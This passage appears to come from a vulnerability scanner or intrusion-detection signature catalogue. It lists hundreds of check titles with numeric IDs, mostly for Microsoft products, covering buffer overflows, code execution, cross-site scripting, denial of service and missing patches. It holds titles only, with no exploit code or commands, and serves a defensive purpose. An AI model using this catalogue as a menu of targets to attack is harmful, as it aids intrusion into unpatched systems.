file memory allocation code execution [41451] Microsoft Visio object header code execution [41447] Microsoft Project file memory allocation code execution [41411] Microsoft Internet Explorer setRequestHeader security bypass [41395] Apple Safari for Windows address bar spoofing [41388] Apple Safari for Windows .ZIP file code execution [41380] Microsoft Jet Database Engine Word file buffer overflow [41338] Microsoft Internet Explorer CreateTextRange method denial of service [41223] Novell GroupWise Windows client API security bypass [41156] Cisco Secure Access Control Server (ACS) for Windows User-Changeable Password (UCP) utility CSuserCGI.exe cross-site scripting [41154] Cisco Secure Access Control Server (ACS) for Windows User-Changeable Password (UCP) utility CSuserCGI.exe buffer overflow [41147] Microsoft Internet Explorer FTP command execution [41102] Citrix Presentation Server Client for Windows credential information disclosure [41070] Acronis True Image Echo Group Server Acronis True Image Windows Agent component denial of service [41057] Microsoft Internet Explorer Java and XML information disclosure [40932] Symantec Backup Exec for Windows Server Calendar ActiveX control file overwrite [40926] Symantec Backup Exec for Windows Server Calendar ActiveX control buffer overflow [40888] Microsoft Office file allocation error code execution [40887] Microsoft Office Excel file cell parsing code execution [40884] Microsoft Outlook mailto URI code execution [40878] Microsoft Excel conditioning formatting code execution [40877] Microsoft Excel rich text code execution [40876] Microsoft Excel formula calcuation code execution [40875] Microsoft Excel Style record data code execution [40874] Microsoft Excel .slk file import code execution [40873] Microsoft Excel data validation code execution [40735] Microsoft Internet Explorer danim.dll and lmrt.dll unspecified [40579] Microsoft Active Directory unspecified denial of service [40577] Microsoft Internet Explorer files denial of service [40467] Apple Mac OS X Windows File Sharing unspecified vulnerability [40400] Microsoft DirectSpeechSynthesis Module ActiveX control buffer overflow [40319] Microsoft Internet Explorer certificate spoofing [40316] Microsoft Works Converter section header index table information code execution [40314] Microsoft Publisher .pub invalid memory index code execution [40302] Microsoft MN-500 wireless base station configuration file information disclosure [40286] Microsoft Internet Explorer src attribute denial of service [40283] Microsoft Internet Explorer style attribute denial of service [40120] Skype for Windows SkypeFind cross-zone code execution [40100] Microsoft Word malformed string code execution [40096] Microsoft Works Converter field length information code execution [40095] Microsoft Works Converter section length header code execution [40092] Microsoft Publisher .pub invalid memory reference code execution [40090] Microsoft Internet Explorer argument data handling code execution [40089] Microsoft Internet Explorer property method code execution [40088] Microsoft Internet Explorer HTML layout positioning combination code execution [40087] Microsoft Internet Explorer multiple ActiveX control denial of service [40066] Microsoft Word object code execution [39975] Microsoft Class Package Export Tool clspack.exe buffer overflow [39773] Microsoft Visual Basic Enterprise Edition .dsr file buffer overflow [39755] Microsoft Visual InterDev .SLN buffer overflow [39754] Skype for Windows cross-zone code execution [39699] Microsoft Excel macro handling code execution [39576] Novell Client for Windows nicm.sys privilege escalation [39558] Microsoft FoxServer ActiveX control command execution [39557] Microsoft Rich Textbox ActiveX control file overwrite [39235] Microsoft IIS root folders file change notification privilege escalation [39230] Microsoft IIS HTML encoded ASP code execution [39209] Microsoft Word wordart denial of service [39208] Microsoft Office Publisher multiple denial of service [39158] Apache HTTP Server Windows SMB shares information disclosure [39113] Apple Mac OS X Microsoft Office Spotlight Importer code execution [39021] Microsoft Office XML document weak security [38908] Skype for Windows skype4com URI Handler buffer overflow [38883] Microsoft Optical Desktop information disclosure [38826] Microsoft Internet Explorer WPAD information disclosure [38722] Microsoft DirectX DirectShow WAV and AVI code execution [38721] Microsoft DirectX DirectShow SAMI code execution [38716] Microsoft Internet Explorer DHTML object code execution [38715] Microsoft Internet Explorer element tag code execution [38714] Microsoft Internet Explorer cloneNode and nodeValue code execution [38713] Microsoft Internet Explorer ActiveX setExpression code execution [38697] Wireshark SSCOP dissector denial of service vulnerable Windows version detected [38696] Wireshark DHCP dissector denial of service vulnerable Windows version detected [38695] Wireshark IPsec ESP preference parser off-by-one vulnerable Windows version detected [38694] Wireshark SCSI dissector denial of service vulnerable Windows version detected [38693] Wireshark NFS dissector buffer overflow vulnerable Windows version detected [38691] Wireshark SSH dissector denial of service vulnerable Windows version detected [38690] Wireshark Checkpoint FW-1 dissector format string vulnerable Windows version detected [38677] Symantec Backup Exec for Windows Server bengine.exe denial of service [38676] Symantec Backup Exec for Windows Server bengine.exe NULL pointer dereference denial of service [38499] Microsoft Jet Database Engine MDB file buffer overflow [38440] Microsoft Forms ActiveX control denial of service [38434] Novell Client for Windows NWFILTER.SYS privilege escalation [38432] Microsoft SAFRCFileDlg.RASetting ActiveX control buffer overflow [38431] Windows Live Messenger connection detected [38430] Microsoft Office Web Component OWC11.DataSourceControl ActiveX denial of service [38336] Microsoft Internet Explorer DNS same-origin policy security bypass [38324] Microsoft Outlook and Outlook Express URI handling command execution [38292] Microsoft Sysinternals DebugView privilege escalation [37261] Microsoft Internet Explorer .exe file download warning bypass [37236] Microsoft SQL Slammer patch not installed [37230] Microsoft SQL Server MS00-092 patch not installed [37229] Microsoft SQL Server MS02-043 patch not installed [37228] Microsoft SQL Server MS02-034 patch not installed [37223] Microsoft ActiveSync weak XOR encryption [37200] Microsoft SQL Server 2000 Service Pack 1 update is not installed [37198] Microsoft SQL Server 2000 Service Pack 3 update is not installed [37044] Microsoft Expression Media password information disclosure [37035] Microsoft Visual FoxPro FPOLE.OCX ActiveX FoxDoCmd command execution [36982] Windows Live Messenger shared image files buffer overflow [36981] Symantec Veritas Backup Exec client for Windows Servers unspecified [36953] Microsoft DirectX Media SDK traffic detected [36848] Microsoft Internet Explorer OnKeyDown information disclosure [36818] Microsoft Internet Explorer address bar spoofing [36817] Microsoft Internet Explorer script error code execution [36801] Microsoft Word document workspace code execution [36715] Microsoft Internet Security and Acceleration (ISA) Server SOCKS4 information disclosure [36572] Microsoft Visual Studio PDWizard ActiveX control code execution [36571] Microsoft Visual Studio VB To VSI Support Library ActiveX control file overwrite [36562] Microsoft Visual Basic .VBP file buffer overflow [36554] Wireshark NTP dissector format string vulnerable Windows version detected [36553] Wireshark NCP NMAS and NDPS dissector off-by-one vulnerable Windows version detected [36552] Wireshark MOUNT dissector denial of service vulnerable Windows version detected [36550] Wireshark XML dissector format string vulnerable Windows version detected [36549] Wireshark MQ dissector format string vulnerable Windows version detected [36547] Wireshark ANSI MAP dissector format string vulnerable Windows version detected [36546] Wireshark GSM BSSMAP dissector denial of service vulnerable Windows version detected [36537] Microsoft MSN Messenger video request detected [36509] Microsoft SQL Server sqldmo.dll ActiveX buffer overflow [36496] Microsoft Visual FoxPro FPOLE.OCX ActiveX control buffer overflow [36494] Microsoft Internet Explorer saved pages cross-site scripting [36455] HTML Microsoft Agent ActiveX detected [36351] Microsoft Internet Explorer with SeaMonkey command execution [36314] Microsoft MSN Messenger video conversations buffer overflow [36302] XAMPP for Windows unspecified privilege escalation [36128] Microsoft Internet Explorer position:relative HTML style code denial of service [36073] Apple Safari for Windows download weak security [36032] Cisco VPN Client for Windows cvpnd.exe privilege escalation [36029] Cisco VPN Client for Windows Dial-up Networking Interface privilege escalation [36027] Microsoft Internet Explorer ActiveX popup blocker denial of service [36003] Microsoft Internet Explorer Netscape command execution [35974] Microsoft Internet Explorer FTP username and password information disclosure [35970] Microsoft DirectX Media SDK DXSurface.LivePicture.FLashPix.1 (DXTLIPI.DLL) ActiveX control buffer overflow [35855] Microsoft Register Server DLL file denial of service [35815] Microsoft Excel index value attributes code execution [35764] Microsoft Message Queuing Service buffer overflow [35759] Microsoft Internet Explorer pdwizard.ocx code execution [35755] Microsoft Internet Explorer tblinf32.dll code execution [35752] Microsoft Agent ActiveX control buffer overflow [35749] Microsoft Internet Explorer CSS string code execution [35579] Sun Java System Application Server Windows source disclosure [35492] Microsoft DirectX Targa buffer overflow [35455] Microsoft Internet Explorer Zone domain name denial of service [35421] Microsoft Internet Explorer document.open address bar spoofing [35346] Microsoft Internet Explorer FirefoxURL command execution [35315] Microsoft Internet Explorer history.length information disclosure [35217] Microsoft Excel Workspace designation code execution [35215] Microsoft Excel active worksheet code execution [35213] Microsoft Office Web Components DataSourceControl object code execution [35212] Microsoft Office Web Components Spreadsheet object code execution [35210] Microsoft Excel version code execution [35197] Microsoft Internet Information Services URL parser buffer overflow [35195] Microsoft XML Core Services (MSXML) memory request code execution [35182] Microsoft Virtual PC and Virtual Server guest operating system buffer overflow [35163] Microsoft Internet Explorer file: URI information disclosure [35153] Microsoft Internet Explorer FTP implementation information disclosure [35132] Microsoft Excel sheet name buffer overflow [35118] Nessus Windows GUI cross-site scripting [35064] Microsoft MSN Messenger SIP weak security [34989] Microsoft Internet Explorer resource:// information disclosure [34867] Microsoft Internet Explorer IDN authentication dialog spoofing [34849] Microsoft Office MSODataSourceControl ActiveX control buffer overflow [34755] Microsoft Internet Explorer Outlook Express Address Book object denial of service [34754] Microsoft Internet Explorer MSHtmlPopupWindow object denial of service [34720] Microsoft FrontPage Personal Web Server CERN Image Map Dispatcher buffer overflow [34719] Microsoft FrontPage CERN Image Map Dispatcher information disclosure [34705] Microsoft Internet Explorer location URL spoofing [34696] Microsoft Internet Explorer page update cross-domain security bypass [34650] Microsoft Internet Explorer Javascript src attribute denial of service [34639] Microsoft .NET Framework JIT Compiler service buffer overflow [34638] Microsoft .NET Framework NULL byte termination information disclosure [34637] Microsoft .NET Framework PE Loader service buffer overflow [34632] Microsoft Internet Explorer navigation cancel page spoofing [34630] Microsoft Internet Explorer Speech API ActiveX control code execution [34626] Microsoft Internet Explorer uninitialized object code execution [34621] Microsoft Internet Explorer multiple language packs code execution [34619] Microsoft Internet Explorer CSS tag code execution [34610] Microsoft Visio compressed document packaging code execution [34607] Microsoft Visio version number code execution [34600] Microsoft VDT Database Designer VDT70.DLL ActiveX control buffer overflow [34476] Microsoft Visual Basic Company Name buffer overflow [34475] Microsoft Visual Basic project detail buffer overflow [34473] Microsoft Office 2000 ActiveX control buffer overflow [34434] Microsoft IIS Hit-highlighting security bypass [34418] Microsoft Internet Information Server (IIS) AUX/.aspx denial of service [34343] Microsoft SharePoint Server default.aspx PATH_INFO cross-site scripting [33993] VMware Workstation Windows guest debugging unspecified [33978] Microsoft Internet Explorer LF response splitting [33915] Microsoft Excel autofilter code execution [33914] Microsoft Excel placeholder data code execution [33913] Microsoft Excel BIFF file format buffer overflow [33908] Microsoft Office drawing object code execution [33901] Microsoft Word RTF parsing code execution [33899] Microsoft Word function call code execution [33890] Microsoft Exchange IMAP command denial of service [33889] Microsoft Exchange MIME base64 code execution [33888] Microsoft Exchange iCal MODPROPS denial of service [33887] Microsoft Exchange UTF character set cross-site scripting [33715] Microsoft Internet Explorer unspecified JavaScript denial of service [33713] Microsoft Word 2007 multiple unspecified denial of service [33712] Microsoft Word 2007 wwlib.dll buffer overflow [33673] CA ARCserve Backup for Windows detected [33478] Multiple vendor image viewers for Windows BMP buffer overflow [33447] Microsoft security updates not available for version of Microsoft Data Access Components [33446] Microsoft security updates not available for Microsoft Internet Explorer version [33415] Microsoft Internet Explorer JavaScript DNS pinning code execution [33355] Microsoft Internet Explorer msauth.dll code execution [33317] Microsoft Internet Explorer UTF-7 encoded URL cross-site scripting [33265] Microsoft Agent ActiveX control Character.Load() code execution [33256] Microsoft Internet Explorer HTML object freed memory code execution variant [33255] Microsoft Internet Explorer HTML object freed memory code execution [33254] Microsoft Internet Explorer CSS text style code execution [33253] Microsoft Internet Explorer HTML object uninitialized array member code execution [33252] Microsoft Internet Explorer chtskdic.dll COM object code execution [33041] Microsoft Excel XML and XLS file denial of service [33039] Microsoft Office WMF file denial of service [32939] Microsoft Internet Explorer resizeTo denial of service [32907] Microsoft Xbox 360 hypervisor code execution [32906] Microsoft Xbox 360 hypervisor security bypass [32831] Microsoft Internet Explorer BrowseDialog ActiveX control denial of service [32769] Microsoft Publisher .pub file memory validation code execution [32754] Citrix Presentation Server Client for Windows ICA code execution [32739] Microsoft Capicom Certificates ActiveX control code execution [32737] Microsoft Content Management Server (MCMS) HTTP request cross-site scripting [32736] Microsoft Content Management Server (MCMS) HTTP GET code execution [32649] Microsoft Internet Explorer onUnload handler URL spoofing [32647] Microsoft Internet Explorer onUnload handler denial of service [32631] Microsoft SQL Server 2000 Service Pack 2 update is not installed [32503] Microsoft Word document malformed string code execution [32457] Microsoft Internet Explorer getElementById denial of service [32454] Microsoft Visual Studio time functions denial of service [32427] Microsoft Internet Explorer COM ActiveX object code execution [32404] Microsoft Knowledge Base Article 905495 is not installed [32403] Microsoft Knowledge Base Article 905414 is not installed [32178] Microsoft Office Excel malformed record code execution [32106] Microsoft Internet Explorer COM object code execution [32100] Microsoft Internet Explorer FTP response code execution [32097] Microsoft Word drawing object code execution [32096] Microsoft Word macro code execution [32095] Microsoft Internet Explorer COM object code execution [32089] Microsoft Fronpage Extensions directory /_vti_log/ present [32078] Microsoft Fronpage Extensions directory /_vti_bin/ present [32076] Microsoft Frontpage Extensions directory /_vti_pvt/ present [32074] Microsoft IIS iissamples directory present [32020] Fullaspsite Asp Hosting Sitesi windows.asp SQL injection [31914] Telestream Flip4Mac Windows Media Components for QuickTime WMV file code execution [31867] Microsoft Internet Explorer ActiveX multiple properties denial of service [31840] Microsoft Exchange Server detected [31834] Microsoft Word document function code execution [31814] Microsoft Internet Explorer IFRAME file URI denial of service [31675] Microsoft Internet Explorer BrowseDialog ActiveX control denial of service [31665] Microsoft Visual Studio .rc file buffer overflow [31644] Microsoft IIS Web server access.cnf file detected [31643] Microsoft HTML Help Workshop .HPJ files buffer overflow [31642] Microsoft IIS Web server service.cnf file detected [31638] Microsoft IIS Web server svcacl.cnf file detected [31630] Microsoft Internet Information Services IISAdmin directory detected [31555] Microsoft HTML Help Workshop .CNT files buffer overflow [31549] Microsoft Internet Explorer CCRP Folder Treeview ActiveX control denial of service [31358] Microsoft XML Core Services IFRAME code execution [31287] Microsoft Internet Explorer VML record buffer overflow [31284] Adobe Acrobat detected on Windows system [31208] Microsoft Excel Palette record buffer overflow [31207] Microsoft Excel column record buffer overflow [31206] Microsoft Excel string buffer overflow [31205] Microsoft Excel malformed record buffer overflow [31204] Microsoft Excel IMDATA record buffer overflow [31196] Microsoft Office 2003 Brazilian Grammar Checker buffer overflow [31188] Microsoft Outlook Finder.exe .oss file buffer overflow [31187] Microsoft Outlook email long header denial of service [31186] Microsoft Outlook .iCal meeting request VEVENT buffer overflow [31127] Microsoft Antivirus engine pdf buffer overflow [31011] Microsoft Internet Information Services IUSR_Machine command execution [30959] Microsoft Outlook ole32.dll ActiveX denial of service [30905] Microsoft Project Server 2003 pdsrequest.asp information disclosure [30885] Microsoft Word pointer code execution [30806] Microsoft Word data structure code execution [30738] Microsoft Word data string code execution [30712] Novell Client for Windows SRVLOC.SYS component denial of service [30609] Microsoft OLE Dialog component code execution [30603] Microsoft Internet Explorer TIF folder OBJECT tag information disclosure [30602] Microsoft Internet Explorer TIF folder drag and drop information disclosure [30601] Microsoft Internet Explorer DHTML script code execution [30600] Microsoft Internet Explorer script error handling code execution [30596] Microsoft Step-by-Step Interactive Training bookmark link buffer overflow [30220] Microsoft Internet Explorer Phishing Filter active [30168] Microsoft Internet Explorer ieframe.dll certificate spoofing [30004] Microsoft XMLHTTP ActiveX control code execution [29945] Microsoft Agent .ACF file buffer overflow [29915] Microsoft Visual Studio WmiScriptUtils.dll code execution [29860] Microsoft .NET Framework request filtering insecure [29837] Microsoft Internet Explorer ADODB.Connection code execution [29827] Microsoft Internet Explorer Popup Address bar spoofing [29750] Microsoft Active Directory unauthorized login attempt rejected [29749] Microsoft Active Directory security audit setup failed [29748] Microsoft Active Directory security attributes changed [29747] Microsoft Active Directory Security Descriptor Propagator terminated [29746] Microsoft Active Directory addition of replication link success [29745] Microsoft Active Directory addition of replication link failed [29744] Microsoft Active Directory replication connection created [29742] Microsoft Active Directory object operation performed [29741] Microsoft Active Directory outbound replication disabled [29740] Microsoft Active Directory host not global catalog server [29737] Microsoft Active Directory maximum LDAP connections reached [29736] Microsoft Active Directory inbound replication disabled [29735] Microsoft Active Directory calculate security descriptor failed [29733] Microsoft Active Directory write security descriptor failed [29731] Microsoft Active Directory object operation failed [29730] Microsoft Active Directory right grant attempt failed [29729] Microsoft Active Directory domain controller removal failed [29728] Microsoft Active Directory SID inherit attempt failed [29726] Microsoft Active Directory domain removed from enterprise [29725] Microsoft Active Directory database initialization failure [29724] Microsoft Active Directory certificate rejected, not trusted [29722] Microsoft Active Directory certificate replication access rejected [29713] Microsoft Internet Information Server MS01-026 patch is not installed [29680] Microsoft Internet Information Server MS01-044 patch is not installed [29670] Microsoft Internet Explorer 7 is installed [29507] Microsoft Office 2003 unspecified PowerPoint NULL pointer dereference denial of service [29462] ISA Server Windows Out-Of-Band attack detected [29242] Microsoft Excel COLINFO code execution [29239] Microsoft Excel Lotus 1-2-3 file buffer overflow [29238] Microsoft Excel DATETIME buffer overflow [29234] Microsoft PowerPoint bit record code execution [29233] Microsoft PowerPoint data record code execution [29232] Microsoft PowerPoint object pointer code execution [29225] Microsoft PowerPoint unspecified .ppt file code execution [29224] Microsoft Word mail merge file code execution [29216] Microsoft Office Smart Tag code execution [29215] Microsoft Word malformed string code execution [29213] Microsoft Office malformed record code execution [29212] Microsoft Office malformed chart record code execution [29210] Microsoft XML Core Services XLST buffer overflow [29209] Microsoft Office malformed string code execution [29206] Microsoft XML Core Services XMLHTTP information disclosure [29199] Microsoft Internet Explorer layout combinations code execution [29135] Microsoft Internet Explorer CSS HTML INPUT DIV element denial of service [29092] Microsoft Visual Basic msgbox unspecified [29004] Microsoft Internet Explorer VML buffer overflow [28942] Microsoft Internet Explorer DirectAnimation keyframe buffer overflow [28893] Microsoft Internet Explorer HTTP 1.1 compression long URL buffer overflow variant [28775] Microsoft Word unspecified memory corruption code execution [28658] Microsoft ASP.NET Framework HTTP cross-site scripting [28651] Microsoft Indexing Service cross-site scripting [28650] Microsoft Office PICT image filter code execution [28648] Microsoft Publisher .pub file malformed string code execution [28647] Microsoft Office EPS filter code execution [28608] Microsoft Internet Explorer daxctle.ocx denial of service [28559] Proventia Server for Windows is installed [28532] AK-Systems Windows Terminal unauthorized VNC access [28522] Microsoft Internet Explorer HTTP 1.1 compression long URL buffer overflow [28516] Microsoft Internet Explorer multiple COM object color property denial of service [28511] Microsoft Internet Explorer multiple Visual Studio COM object denial of service [28444] Microsoft Internet Explorer tsuserex.dll COM object denial of service [28439] Microsoft Internet Explorer msoe.dll COM object denial of service [28438] Microsoft Internet Explorer chtskdic.dll COM object denial of service [28436] Microsoft Internet Explorer imskdic.dll COM object denial of service [28336] Symantec VERITAS Backup Exec for Windows Server RPC interface buffer overflow [28068] Microsoft Internet Explorer deleted frame access denial of service [28066] Microsoft Internet Explorer ADODB.Recordset ActiveX object denial of service [28046] Microsoft Internet Explorer NDFXArtEffects ActiveX object denial of service [28043] Microsoft Internet Explorer HTML rendering code execution [28042] Microsoft Internet Explorer Window location information disclosure [28040] Microsoft Internet Explorer cross-domain code execution [28039] Microsoft Internet Explorer ActiveX COM object code execution [28037] Microsoft Internet Explorer chained CSS code execution [28034] Microsoft Internet Explorer HTML layout code execution [28025] Microsoft PowerPoint BIFF file format malformed record code execution [28023] Microsoft Visual Basic for Applications (VBA) document property buffer overflow [27932] Microsoft Internet Explorer native function iteration denial of service [27931] Microsoft Internet Explorer Forms.ListBox.1 and Forms.ComboBox.1 ActiveX object denial of service [27930] Microsoft Internet Explorer ASFSourceMediaDescription ActiveX object denial of service [27929] Microsoft Internet Explorer Internet.HHCtrl ActiveX object denial of service [27900] Microsoft Internet Explorer wininet.dll denial of service [27890] Microsoft Internet Explorer href title denial of service [27884] Microsoft Internet Explorer CEnroll ActiveX object denial of service [27854] Microsoft IIS ASP cache virtual server information disclosure [27845] Microsoft Internet Explorer OVCtl ActiveX object denial of service [27833] Microsoft ISA file extension security bypass [27804] Microsoft Internet Explorer WebViewFolderIcon ActiveX object code execution [27803] Microsoft Internet Explorer DataSourceControl ActiveX object denial of service [27795] Microsoft Works wksss.exe denial of service [27794] Microsoft Works wksss.exe buffer overflow [27783] Microsoft PowerPoint powerpnt.exe unspecified vulnerability [27782] Microsoft PowerPoint unspecified memory corruption [27781] Microsoft PowerPoint unspecified mso.dll code execution [27762] Microsoft Internet Explorer DXImageTransform.Microsoft.Gradient ActiveX object denial of service [27761] Microsoft Internet Explorer MHTMLFile ActiveX object denial of service [27760] Microsoft Internet Explorer FolderItem control denial of service [27740] Microsoft PowerPoint mso.dll malformed shape code execution [27713] Microsoft Internet Explorer RevealTrans ActiveX object denial of service [27675] Microsoft Internet Explorer TriEditDocument ActiveX object denial of service [27653] Microsoft Excel Asian language editions Style and Repair buffer overflow [27649] Microsoft Internet Explorer HtmlDlgSafeHelper ActiveX object denial of service [27626] Microsoft Word hlink.dll buffer overflow [27623] Microsoft Internet Explorer Object.Microsoft.DXTFilter ActiveX object denial of service [27622] Microsoft Internet Explorer DirectAnimation.DAUserData ActiveX object denial of service [27621] Microsoft Internet Explorer RDS.DataControl ActiveX object denial of service [27617] Microsoft Office mso.dll LsCreateLine() denial of service [27609] Microsoft Office property field buffer overflow [27607] Microsoft Office string parsing buffer overflow [27604] Microsoft Excel cell rebuilding code execution [27599] Microsoft Internet Explorer OutlookExpress.AddressBook ActiveX object denial of service [27596] Microsoft Internet Explorer ADODB.Recordset ActiveX object denial of service [27592] Microsoft Internet Explorer table.frameset appendChild() denial of service [27573] Microsoft Internet Explorer HTML Help HHCtrl ActiveX control buffer overflow [27565] Microsoft Internet Explorer StructuredGraphicsControl SourceURL denial of service [27558] Microsoft Office PNG buffer overflow [27556] Microsoft Office GIF filter buffer overflow [27550] Novell GroupWise Windows Client API unauthorized email access [27544] Microsoft Office Excel SELECTION buffer overflow [27542] Microsoft Office and Microsoft Works Suite Excel SELECTION buffer overflow [27466] Microsoft Office and Microsoft Works Suite Excel LABEL buffer overflow [27464] Microsoft Office Excel FNGROUPCOUNT buffer overflow [27463] Microsoft Office Excel OBJECT buffer overflow [27456] Microsoft Internet Explorer HTA SMB file share command execution [27452] Microsoft Internet Explorer object.documentElement.outer information disclosure [27450] Microsoft Office Suite Excel COLINFO buffer overflow [27312] Microsoft Excel embedded Shockwave Flash Object code execution [27288] Microsoft Internet Explorer ASCII encoded Web filter bypass [27224] Microsoft Office hlink.dll COM object buffer overflow [27179] Microsoft Excel unspecified code execution [26971] Microsoft NetMeeting unspecified memory corruption denial of service [26817] Microsoft Internet Explorer CSS position denial of service [26810] Microsoft Internet Explorer mhtml://mid URL buffer overflow [26808] Microsoft Internet Explorer HTML tag parsing denial of service [26802] Microsoft ASP.NET Framework App_Code folder information disclosure [26796] Microsoft Internet Information Services (IIS) ASP buffer overflow [26784] Microsoft Powerpoint record buffer overflow [26782] Microsoft Internet Explorer .mht files code execution [26777] Microsoft Internet Explorer Address bar spoofing [26774] Microsoft Internet Explorer DXImageTransform.Microsoft.MMSpecialEffect1Input ActiveX object code execution [26768] Microsoft Internet Explorer DXImageTransform.Microsoft.Light ActiveX control code execution [26766] Microsoft Internet Explorer UTF8 encoded HTML code execution [26762] Microsoft Internet Explorer nested OBJECT tag memory corruption variant [26632] Cisco VPN Client for Windows GUI privilege escalation [26556] Microsoft Word document handling buffer overflow [26340] Microsoft Infotech Storage System Library (itss.dll) CHM file heap corruption [26281] Microsoft Internet Explorer mhtml: URL redirection information disclosure [26233] Microsoft ISA Server log file manipulation [26118] Microsoft Office 2003 mailto: information disclosure [26111] Microsoft Internet Explorer modal security dialog box code execution [26027] Ethereal NetXray/Windows Sniffer buffer overflow [25978] Microsoft Internet Explorer nested OBJECT tag memory corruption [25939] HP StorageWorks Secure Path for Windows denial of service [25852] Microsoft Internet Explorer CSS scrollbar denial of service [25844] Microsoft Dynamics GP magic number denial of service [25843] Microsoft Dynamics GP DPS multiple buffer overflows [25842] Microsoft Dynamics GP DPM multiple buffer overflows [25841] Microsoft Dynamics GP DPS and DPM IP address buffer overflow [25840] Microsoft Dynamics GP DPS and DPM string buffer overflow [25818] Multiple Mozilla products windows.controllers array cross-site scripting [25678] Microsoft Office document string buffer overflow [25634] Microsoft Internet Explorer .swf address bar spoofing [25557] Microsoft Internet Explorer address bar spoofing [25556] Microsoft Exchange calendar attachment buffer overflow [25555] Microsoft Internet Explorer navigation method popup security zone bypass [25552] Microsoft Internet Explorer IOIeClientSite code execution [25551] Microsoft Internet Explorer Double-Byte Character Set code execution [25550] Microsoft Exchange Outlook Web Access cross-site scripting [25547] Microsoft Internet Explorer HTML PRE tag code execution [25545] Microsoft Internet Explorer COM objects as ActiveX code execution [25542] Microsoft Internet Explorer HTML parsing code execution [25537] Microsoft FrontPage Server Extensions HTML cross-site scripting [25439] Microsoft .NET ILDASM buffer overflow [25438] Microsoft .NET ILASM buffer overflow [25394] Microsoft Internet Explorer HTA file execution [25392] Microsoft ASP.NET COM and COM+ w3wp.exe denial of service [25379] Microsoft Internet Explorer createTextRange() code execution [25330] Microsoft Commerce Server 2002 authfiles/login.asp authentication bypass [25292] Microsoft Internet Exporer mshtml.dll buffer overflow [25284] Microsoft Internet Explorer HTML CSS null dereference denial of service [25256] Microsoft Internet Explorer Java VM denial of service [25229] Microsoft Excel graphic buffer overflow [25228] Microsoft Excel record buffer overflow [25227] Microsoft Excel formula size buffer overflow [25225] Microsoft Excel parsing format file buffer overflow [25148] Microsoft Visual Studio and Visual InterDev .dbp and .sln DataProject buffer overflow [25011] Microsoft Internet Explorer display adapter JPEG image denial of service [25009] Microsoft Office routing slip metadata buffer overflow [24923] Microsoft Internet Explorer IsComponentInstalled() buffer overflow [24846] Microsoft Internet Explorer window.status memory leak denial of service [24844] Microsoft .asf file detected [24788] Microsoft Internet Explorer Script Engine stack denial of service [24648] Microsoft Internet Explorer drag and drop event file downloading variant [24629] BlackBerry Enterprise Server Attachment Service Microsoft Word file buffer overflow [24490] Microsoft PowerPoint TIFF information disclosure [24487] Microsoft Internet Explorer WMF image code execution [24481] Microsoft HTML Help Workshop .hhp file buffer overflow [24379] Microsoft Internet Explorer ActiveX kill bit settings can be bypassed [24346] Microsoft Office \BaseNamedObjects\Mso97SharedDg denial of service [24188] Microsoft Visual Studio project.dsp code execution [24162] Microsoft Internet Explorer invalid IMG and XML element denial of service [24116] Microsoft Visual Studio UserControl.Load code execution [24089] Avira Desktop for Windows ACE filename buffer overflow [24061] Symantec Norton SystemWorks NProtect directory is hidden from Windows APIs [23895] Microsoft Internet Explorer HTML denial of service [23706] Microsoft MSN Messenger and Internet Explorer image denial of service [23571] Microsoft Internet Explorer cssText information disclosure [23537] Microsoft Excel msvcrt.memmove() buffer overflow [23451] Microsoft Internet Explorer HTTPS proxy authentication information disclosure [23448] Microsoft Internet Explorer download dialog box code execution [23129] Microsoft Outlook Express news server information disclosure [22878] Microsoft Exchange Server and Outlook TNEF overflow [22852] Microsoft Internet Explorer mshtmled.dll denial of service [22474] Microsoft Internet Explorer colon data manipulation [22472] Microsoft Internet Explorer ActiveX HTTP request injection [22413] Microsoft Internet Explorer for Mac OS about: buffer overflow [22379] Microsoft Internet Explorer Web content controlled cross-site scripting [22338] Microsoft Internet Information Server WebDAV request source code disclosure [22318] Microsoft SQL Server 2000 Service Pack 4 update is not installed [22268] Microsoft Log Sink Class ActiveX pkmcore.dll file manipulation [22183] Microsoft Exchange Server 2003 public folder denial of service [22155] Microsoft Knowledge Base Article 896688 is not installed [22073] Microsoft Knowledge Base Article 903235 is not installed [22072] Microsoft Knowledge Base Article 899587 is not installed [22071] Microsoft Knowledge Base Article 896428 is not installed [22069] Microsoft Knowledge Base Article 890859 is not installed [22068] Microsoft Knowledge Base Article 890046 is not installed [22042] Microsoft Internet Explorer command execution [21955] Microsoft Internet Information Server SERVER_NAME request spoofing [21930] Microsoft Internet Explorer URL restricted zone denial of service [21702] Microsoft Internet Explorer Web Folder Behaviors zone bypass [21701] Microsoft Internet Explorer JPEG image buffer overflow [21660] Microsoft ActiveSync brute force allows attacker to guess equipment IDs [21658] Microsoft ActiveSync multiple request denial of service [21553] Microsoft Internet Explorer AJAX denial of service [21537] Microsoft FrontPage style tag denial of service [21455] MSN (Microsoft Network) Messenger .pif denial of service [21352] Microsoft ASP.NET RCP/encoded denial of service [21315] Microsoft Outlook 2002 connector for Domino bypass restrictions [21307] Microsoft Internet Explorer multiple COM object code execution [21271] Microsoft Word font buffer overflow [21193] Microsoft Internet Explorer javaprxy.dll buffer overflow [21100] Microsoft Internet Explorer popup obtain information [21071] Microsoft Internet Explorer BMP memory denial of service [21025] Microsoft ISA Server SecureNAT client configuration denial of service [20975] Microsoft Internet Explorer allows script code modification [20967] Microsoft Exchange Outlook Web Access cross-site scripting [20843] Microsoft ISA Server Netbios bypass policy [20842] Microsoft ISA Server HTTP header cache poisoning [20831] Microsoft Agent character spoof [20830] Microsoft Outlook Express NNTP Response Parsing buffer overflow [20693] Microsoft ASP.NET Framework SQL injection [20692] Microsoft ASP.NET Framework full path disclosure [20683] Microsoft Word .mcw file buffer overflow [20617] Microsoft Internet Explorer information bar security bypass [20409] Microsoft ASP.NET Framework ViewState replay [20408] Microsoft ASP.NET Framework _VIEWSTATE denial of service [20080] Oracle Forms Query/Where Windows popup SQL injection [20026] Microsoft Outlook and Outlook Web Access email client address spoofing [19950] MSN (Microsoft Network) Messenger GIF image code execution [19914] Microsoft Jet Database msjet40.dll library buffer overflow [19875] Microsoft Knowledge Base Article 893066 is not installed [19842] Microsoft Internet Explorer Content Advisor buffer overflow [19841] Microsoft Internet Explorer URL buffer overflow [19831] Microsoft Internet Explorer DHTML object buffer overflow [19828] Microsoft Word document buffer overflow [19716] Microsoft Office InfoPath form information disclosure [19629] Microsoft Exchange Server 2003 folder denial of service [19461] Microsoft Office applications information disclosure [19452] Microsoft Internet Explorer title bar spoofing [19373] Microsoft Internet Explorer and Outlook Express status bar spoofing [19252] Microsoft Knowledge Base Article 890261 is not installed [19225] Microsoft Outlook Web Access owalogon.asp script URL redirect [19214] Microsoft Internet Explorer file URL encode [19141] 